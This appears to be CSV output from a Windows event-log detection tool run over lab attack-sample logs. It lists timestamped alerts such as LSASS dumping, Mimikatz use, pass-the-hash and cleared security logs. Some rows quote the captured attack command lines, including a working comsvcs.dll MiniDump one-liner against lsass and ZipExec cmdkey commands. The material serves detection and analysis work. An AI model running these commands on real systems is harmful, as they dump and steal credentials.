2021-08-23 04:33:52.250 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe"" -Embedding  :  Path: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: C:\WINDOWS\system32\svchost.exe -k DcomLaunch -p",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
2021-10-19 23:33:13.262 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1201-Password Policy Discovery/ID4688-Password policy discovery via commandline.evtx
2021-10-19 23:40:28.001 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4688-Group discovery via commandline.evtx
2021-10-19 23:42:41.218 +09:00,FS03.offsec.lan,4728,medium,User added to global security group,Member added: -  :  SID: S-1-5-21-3410678313-1251427014-1131291384-1004  :  Group: None  :  Subject user: admmig  :  Subject domain: OFFSEC,rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4688-User creation via commandline.evtx
2021-10-19 23:42:41.234 +09:00,FS03.offsec.lan,4720,medium,Local user account created,User: toto3  :  SID:S-1-5-21-3410678313-1251427014-1131291384-1004,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4688-User creation via commandline.evtx
2021-10-19 23:44:30.780 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID4688-Network share discovery or connection via commandline.evtx
2021-10-19 23:45:16.394 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688-Network share manipulation via commandline.evtx
2021-10-20 22:39:12.731 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx
2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4624,informational,Logon Type 9 - NewCredentials,User: admmig  :  Workstation: -  :  IP Address: ::1  :  Port: 0  :  LogonID: 0x266e045  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx
2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x266e045,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx
2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4624,medium,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx
2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4624,high,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx
2021-10-20 22:39:21.730 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Sysmon\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx
2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1086,technique_name=PowerShell  :  Command: powershell.exe -NoP -C ""C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id \Windows\Temp\76nivOxA.dmp full;Wait-Process -Id (Get-Process rundll32).id""  :  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  :  User: OFFSEC\admmig  :  Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,WMI Spawning Windows PowerShell,,rules/sigma/process_creation/win_wmi_spwns_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,PowerShell Get-Process LSASS,,rules/sigma/process_creation/win_susp_powershell_getprocess_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,LSASS Memory Dumping,,rules/sigma/process_creation/win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:18:56.089 +09:00,FS03.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1086,technique_name=PowerShell  :  Command: ""C:\Windows\System32\rundll32.exe""  C:\Windows\System32\comsvcs.dll MiniDump 512 \Windows\Temp\76nivOxA.dmp full  :  Path: C:\Windows\System32\rundll32.exe  :  User: OFFSEC\admmig  :  Parent Command: powershell.exe -NoP -C ""C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id \Windows\Temp\76nivOxA.dmp full;Wait-Process -Id (Get-Process rundll32).id""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:18:56.089 +09:00,FS03.offsec.lan,1,medium,Process Dump via Comsvcs DLL,,rules/sigma/process_creation/win_susp_comsvcs_procdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:18:56.105 +09:00,FS03.offsec.lan,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:18:56.105 +09:00,FS03.offsec.lan,10,critical,Lsass Memory Dump via Comsvcs DLL,,rules/sigma/process_access/sysmon_lsass_dump_comsvcs_dll.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:29:09.758 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x26bdfac,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:09.758 +09:00,FS03.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.123.11  :  Port: 49192  :  LogonID: 0x26bdfac,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:09.773 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x26bdfde,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:09.773 +09:00,FS03.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.123.11  :  Port: 38940  :  LogonID: 0x26bdfde,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:09.836 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x26be000,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:09.836 +09:00,FS03.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.123.11  :  Port: 54742  :  LogonID: 0x26be000,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:09.898 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x26be01f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:09.898 +09:00,FS03.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.123.11  :  Port: 54742  :  LogonID: 0x26be01f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:09.961 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x26be03c,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:09.961 +09:00,FS03.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.123.11  :  Port: 54742  :  LogonID: 0x26be03c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:10.214 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\Temp\2V7Be7Gq.dmp  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:10.214 +09:00,FS03.offsec.lan,5145,medium,Suspicious Access to Sensitive File Extensions,,rules/sigma/builtin/security/win_susp_raccess_sensitive_fext.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:10.542 +09:00,FS03.offsec.lan,4656,critical,LSASS Access from Non System Account,,rules/sigma/builtin/security/win_lsass_access_non_system_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:10.542 +09:00,FS03.offsec.lan,4656,high,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:11.230 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\Temp\2V7Be7Gq.dmp  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:11.230 +09:00,FS03.offsec.lan,5145,medium,Suspicious Access to Sensitive File Extensions,,rules/sigma/builtin/security/win_susp_raccess_sensitive_fext.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:12.553 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\Temp\2V7Be7Gq.dmp  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:12.553 +09:00,FS03.offsec.lan,5145,medium,Suspicious Access to Sensitive File Extensions,,rules/sigma/builtin/security/win_susp_raccess_sensitive_fext.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:13.725 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Sysmon\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:22.291 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Sysmon\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:39:26.349 +09:00,FS03.offsec.lan,4104,high,Suspicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/powershell_suspicious_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx
2021-10-20 23:39:26.349 +09:00,FS03.offsec.lan,4104,high,PowerShell Get-Process LSASS in ScriptBlock,,rules/sigma/powershell/powershell_script/powershell_suspicious_getprocess_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx
2021-10-22 01:27:02.319 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: cscript.exe  //e:jscript testme.js  :  Path: C:\Windows\System32\cscript.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
2021-10-22 01:27:02.319 +09:00,LAPTOP-JU4M3I0E,1,medium,WSF/JSE/JS/VBA/VBE File Execution,,rules/sigma/process_creation/win_susp_script_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
2021-10-22 01:27:02.999 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmdkey.exe"" /generic:Microsoft_Windows_Shell_ZipFolder:filename=C:\Users\bouss\AppData\Local\Temp\lync.zip /pass:tWIMmIF /user:""""  :  Path: C:\Windows\System32\cmdkey.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: cscript.exe  //e:jscript testme.js",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
2021-10-22 01:27:02.999 +09:00,LAPTOP-JU4M3I0E,1,medium,Suspicious ZipExec Execution,,rules/sigma/process_creation/win_pc_susp_zipexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
2021-10-22 01:27:12.858 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Users\bouss\AppData\Local\Temp\Temp3_lync.zip\i.exe""   :  Path: C:\Users\bouss\AppData\Local\Temp\Temp3_lync.zip\i.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: cscript.exe  //e:jscript testme.js",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
2021-10-22 01:27:12.946 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmdkey.exe"" /delete Microsoft_Windows_Shell_ZipFolder:filename=C:\Users\bouss\AppData\Local\Temp\lync.zip  :  Path: C:\Windows\System32\cmdkey.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: cscript.exe  //e:jscript testme.js",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
2021-10-22 01:27:12.946 +09:00,LAPTOP-JU4M3I0E,1,medium,Suspicious ZipExec Execution,,rules/sigma/process_creation/win_pc_susp_zipexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
2021-10-22 01:27:14.015 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Program Files\Elastic\Endpoint\elastic-endpoint.exe""  popup ""Malicious Behavior Detection Alert"" ""Elastic Security detected Execution via Renamed Signed Binary Proxy"" ""C:\Program Files\Elastic\Endpoint\cache\resources\elastic-endpoint-security.png""  :  Path: C:\Program Files\Elastic\Endpoint\elastic-endpoint.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: ""C:\Program Files\Elastic\Endpoint\elastic-endpoint.exe"" run",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
2021-10-22 02:38:36.711 +09:00,FS03.offsec.lan,4104,medium,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/powershell_web_request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx
2021-10-22 02:53:42.530 +09:00,FS03.offsec.lan,59,informational,Bits Job Creation,Job Title: BITS Transfer  :  URL: https://releases.ubuntu.com/20.04.3/ubuntu-20.04.3-desktop-amd64.iso,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID60-High volume file downloaded with BITS.evtx
2021-10-22 05:40:12.867 +09:00,FS03.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface  :  Command: mimikatz.exe  :  Path: C:\TOOLS\Mimikatzx64\mimikatz.exe  :  User: OFFSEC\admmig  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx
2021-10-22 05:40:12.867 +09:00,FS03.offsec.lan,1,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx
2021-10-22 05:40:12.867 +09:00,FS03.offsec.lan,1,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx
2021-10-22 05:40:43.120 +09:00,FS03.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface  :  Command: cmd.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: mimikatz.exe",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx
2021-10-22 05:40:43.120 +09:00,FS03.offsec.lan,1,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx
2021-10-22 05:40:43.120 +09:00,FS03.offsec.lan,1,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx
2021-10-22 05:40:43.136 +09:00,FS03.offsec.lan,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx
2021-10-22 05:40:43.136 +09:00,FS03.offsec.lan,10,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx
2021-10-22 05:40:43.136 +09:00,FS03.offsec.lan,10,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx
2021-10-22 22:39:49.619 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Firewall configuration enumerated (command).evtx
2021-10-22 23:02:11.218 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Scheduled task configuration enumeration.evtx
2021-10-22 23:02:15.177 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Sysmon\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Scheduled task configuration enumeration.evtx
2021-10-24 06:50:11.666 +09:00,FS03.offsec.lan,4625,low,Logon Failure - Unknown Reason,User: -  :  Type: 10  :  Workstation: -  :  IP Address: 10.23.23.9  :  SubStatus: 0x0  :  AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0001-Initial access/T1078-Valid accounts/ID4625-brutfoce with denied access due to account restriction.evtx
2021-10-24 06:51:57.212 +09:00,FS03.offsec.lan,4625,low,Logon Failure - Unknown Reason,User: -  :  Type: 10  :  Workstation: -  :  IP Address: 10.23.23.9  :  SubStatus: 0x0  :  AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0001-Initial access/T1078-Valid accounts/ID4625-brutfoce with denied access due to account restriction.evtx
2021-10-26 03:04:30.334 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:09:51.875 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.002 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
